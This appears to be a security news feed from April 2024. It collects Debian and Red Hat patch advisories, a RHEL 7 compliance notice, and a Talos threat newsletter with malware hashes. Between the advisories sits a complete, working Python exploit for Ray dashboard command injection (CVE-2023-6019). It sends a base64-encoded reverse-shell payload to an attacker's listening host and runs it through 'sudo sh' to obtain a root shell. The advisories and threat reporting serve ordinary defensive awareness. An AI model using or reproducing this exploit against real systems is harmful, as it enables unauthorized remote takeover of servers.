Debian Linux Security Advisory 5656-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5656-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 11, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3157 CVE-2024-3515 CVE-2024-3516Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.122-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYYJcAACgkQZF0CR8NudjdhkRAAw6sMjh+3xY72+Q5DbvExle0J+9jEL9OALHhrVvWzGpUQjOx4sw64m03ZOV6G9W7/j5EqzMeSKrVFdRi+e/mANlBrXs4QfH1O+5cMD9fYUO/d6nPbFQJXwYOeU4GINkJOv690CQcIVAei1Udp6dmwL8pe4BAVTnDqWWgyxhBubBPM+RLVBu6/gKFa6Fm8fyOjcuwrwsdCVFNd2T9hICnQNLbh3DOFJ+6ElFCYDvcNbfdfYOXh/NIs3x8eImguEPsm8u4VmDAyg6JUZunUSiXFeVFqwmbiBDaloXjLsTRu2uBjeQcdMrU/FoZoKataksl5MZJmfsRspCIina4WOWkeL1tcg3texfCFVQ/XWreJKvFoyGOdBXcAVEcY+ePDmkahmQu3QyOB/QD4bxq76T2bwWylpB95S8f31Dr1SiJ3ru7NjKQsezxls3Ey1IWBia/qG4rYtmjwi/zcyTeejROSTXLBeCvOKFe7jPCw6iQ5fZb9eWtiBbJ2mIJBhSyrSzCKbfQjSRpV2JHPp5A7IksBcq8gtoL3L3ubhnaFsTvvtPeTQQK3pJvN+sZgnx/QMVSl2Kh/6HF28JqOPqGZWtSE+fcoQM0zubO41/LGOowNzvFK3rIa+iolu+iSykup40Xmr3sh+q8HSDKweX3znVFj+JFd9pk6DiTBwcKDjipTKlA==Cqgo-----END PGP SIGNATURE-----

Debian Security Advisory 5656-1

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned. Versions 2.6.3 and below are affected.

    # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)# Description:#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is#  not validated before being inserted into a system command executed in a shell, allowing#  for arbitrary command execution. If the system is configured to allow passwordless sudo#  (a setup some Ray configurations require) this will result in a root shell being returned#  to the user. If not configured, a user level shell will be returned# Version: <= 2.6.3# Date: 2024-4-10# Exploit Author: Fire_Wolf# Tested on: Ubuntu 20.04.6 LTS# Vendor Homepage: https://www.ray.io/# Software Link: https://github.com/ray-project/ray# CVE: CVE-2023-6019# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe# ==========================================================================================# !usr/bin/python3# coding=utf-8import base64import argparseimport requestsimport urllib3proxies = {"http": "127.0.0.1:8080"}headers = {    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}def check_url(target, port):    target_url = target + ":" + port    https = 0    if 'http' not in target:        try:            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)            test_url = 'http://' + target_url            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)            if response.status_code != 200:                is_https = 0                return is_https        except Exception as e:            print("ERROR! The Exception is:" + format(e))    if https == 1:        return "https://" + target_url    else:        return "http://" + target_urldef exp(target,ip,lhost, lport):    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''    print("[*]Payload is: " + payload)    b64_payload = base64.b64encode(payload.encode())    print("[*]Base64 encoding payload is: " + b64_payload.decode())    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)    print(exp_url)    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)    response = requests.get(url=exp_url, headers=headers, verify=False)    if response.status_code == 200:        print("[-]ERROR: Exploit Failed,please check the payload.")    else:        print("[+]Exploit is finished,please check your machine!")if __name__ == '__main__':    parser = argparse.ArgumentParser(        description='''         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃                                                    ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ''',        formatter_class=argparse.RawDescriptionHelpFormatter,    )    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')    args = parser.parse_args()    # target = args.target    ip = args.target    # port = args.port    # lhost = args.lhost    # lport = args.lport    targeturl = check_url(args.target, args.port)    print(targeturl)    print("[*] Checking in url: " + targeturl)    exp(targeturl, ip, args.lhost, args.lport)

Ray OS 2.6.3 Command Injection

Red Hat Security Advisory 2024-1789-03 - An update for bind is now available for Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1789.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind security update  
Advisory ID:        RHSA-2024:1789-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1789  
Issue date:         2024-04-11  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

An update for bind is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)

* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1789-03

Red Hat Security Advisory 2024-1787-03 - An update for squid is now available for Red Hat Enterprise Linux 7. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1787.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:1787-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1787Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2023-46724====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: denial of service in HTTP header parser (CVE-2024-25617)* squid: denial of service in HTTP request parsing (CVE-2023-50269)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46724References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926https://bugzilla.redhat.com/show_bug.cgi?id=2254663https://bugzilla.redhat.com/show_bug.cgi?id=2264309

Red Hat Security Advisory 2024-1787-03

Red Hat Security Advisory 2024-1786-03 - An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1786.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd:2.4/mod_http2 security updateAdvisory ID:        RHSA-2024:1786-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1786Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2024-27316====================================================================Summary: An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_http2: CONTINUATION frames DoS (CVE-2024-27316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-27316References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268277

Red Hat Security Advisory 2024-1786-03

Red Hat Security Advisory 2024-1785-03 - An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1785.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: X.Org server security updateAdvisory ID:        RHSA-2024:1785-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1785Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2024-31080====================================================================Summary: An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:X.Org is an open-source implementation of the X Window System. It provides thebasic low-level functionality that full-fledged graphical user interfaces aredesigned upon.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: User-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-31080References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271997https://bugzilla.redhat.com/show_bug.cgi?id=2271998https://bugzilla.redhat.com/show_bug.cgi?id=2272000

Red Hat Security Advisory 2024-1785-03

Red Hat Security Advisory 2024-1784-03 - An update for gnutls is now available for Red Hat Enterprise Linux 8. Issues addressed include an information leakage vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1784.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gnutls security updateAdvisory ID:        RHSA-2024:1784-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1784Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2024-28834====================================================================Summary: An update for gnutls is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives adetailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:The gnutls package provide the GNU Transport Layer Security (GnuTLS) library,which implements cryptographic algorithms and protocols such as SSL, TLS, andDTLS.This package update fixes a timing side-channel in deterministic ECDSA.Security Fix(es):* gnutls: vulnerable to Minerva side-channel information leak (CVE-2024-28834)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-28834References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-1784-03

As of Jun 30, 2024, the Red Hat Enterprise Linux (RHEL) 7 maintenance support 2 phase ends and Red Hat will no longer update compliance content for RHEL 7. Many policy providers, such as CIS and DISA, will no longer update their policies once maintenance ends.When this support phase ends, you can expect:The RHEL 7 scap-security-guide package will no longer be updated. You can continue to use the content provided after Jun 30, 2024. The content is mature, stable, and still suitable for use by Extended Update Support (EUS) customers after the end of maintenance, however as mentioned before there

As of Jun 30, 2024, the Red Hat Enterprise Linux (RHEL) 7 maintenance support 2 phase ends and Red Hat will no longer update compliance content for RHEL 7. Many policy providers, such as CIS and DISA, will no longer update their policies once maintenance ends.

When this support phase ends, you can expect:

The RHEL 7 scap-security-guide package will no longer be updated. You can continue to use the content provided after Jun 30, 2024. The content is mature, stable, and still suitable for use by Extended Update Support (EUS) customers after the end of maintenance, however as mentioned before there are no updates planned.  

Additionally, the Center for Internet Security (CIS) and Defense Information Systems Agency (DISA) will no longer publish updates to their RHEL 7 profiles . CIS stated that version 4.0.0 will be the final release of their RHEL 7 benchmark. DISA typically ends support of a STIG after the maintenance phase ends, which can be expected in the case of the RHEL 7 STIG.

**Resources to Help Plan Your Upgrade**

If you plan on upgrading as a result of the end of this support phase, RHEL 8 and RHEL 9 each have a STIG, with automation available for both. This automation can be run with Red Hat Insights, Ansible, Satellite, all of this automation is powered by OpenSCAP.

Red Hat has the resources, tools, and consulting offerings you need to keep your systems running and keep up with the latest benefits that Red Hat Enterprise Linux has to offer. Get started by: 

*   Determining which version is best for you
*   Outlining steps for your upgrade project
*   Keeping track of important dates
*   Finding resources to ease your transition

The Red Hat Enterprise Linux upgrade page has those upgrade resources and more. Red Hat has resources to help plan your upgrade.

Red Hat is the world’s leading provider of enterprise open source software solutions, using a community-powered approach to deliver reliable and high-performing Linux, hybrid cloud, container, and Kubernetes technologies.

Read full bio

Red Hat Enterprise Linux 7: End of compliance content on June 30, 2024

The security community is still reflecting on the “What If” of the XZ backdoor.

Thursday, April 11, 2024 14:00

I feel like over the past several years, the “holiday” that is April Fool’s Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you’d find on a news site any day of the week. 

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it’s in “celebration” of a “holiday.” 

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games. 

But at least from what I saw on April 1 of this year, no one tried to “get” anyone with an April Fool’s joke about a ransomware actor requesting payment in the form of “Fortnite” in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (which, as it turns out, smart pillows exist!).  

We’re already dealing with digitally manipulated photos of “Satanic McDonalds,” Twitter’s AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos and more that I hesitate to even make up. 

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.  

**The one big thing **

Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

**Why do I care? **

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country who is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets’ social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account. 

**So now what? **

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don’t know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default — macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here. 

**Top security headlines of the week **

**The security community is still reflecting on the “What If” of the XZ backdoor** that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly on accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user’s SSH connection and secretly run their own code on that user’s machine. The incident is highlighting networking’s reliance on open-source projects, which are often provided little resource and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters) 

**AT&T now says that more than 51 million users were affected by a data breach** that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as “MajorNelson.” AT&T’s notification to affected customers stated that, "The \[exposed\] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information were related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch) 

**Another ransomware group claims they’ve stolen data from United HealthCare, though there is little evidence yet to prove their claim.** Change Health, a subsidiary of United, was recently hit with a massive data breach, pausing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #178: Turla has been around for 20-plus years at this point, but they're still mixing things up 
*   Vulnerability in some TP-Link routers could lead to factory reset 
*   April’s Patch Tuesday includes 150 vulnerabilities, 60 which could lead to remote code execution 
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data 
*   Safeguarding Against CoralRaider: Protecting Your Data from Vietnamese Hackers 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6  
**MD5:** 22ae85259273bc4ea419584293eda886  
**Typical Filename:** KMSAuto++ x64.exe  
**Claimed Product:** KMSAuto++  
**Detection Name:** W32.File.MalParent

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31  
**MD5:** 2fb86be791b4bb4389e55df0fec04eb7  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681  
**MD5:** f1fe671bcefd4630e5ed8b87c9283534  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Hackkms::1201

The internet is already scary enough without April Fool’s jokes

Red Hat Security Advisory 2024-1781-03 - An update for bind9.16 is now available for Red Hat Enterprise Linux 8.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1781.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind9.16 security update  
Advisory ID:        RHSA-2024:1781-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1781  
Issue date:         2024-04-11  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

An update for bind9.16 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)

* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Tag

#linux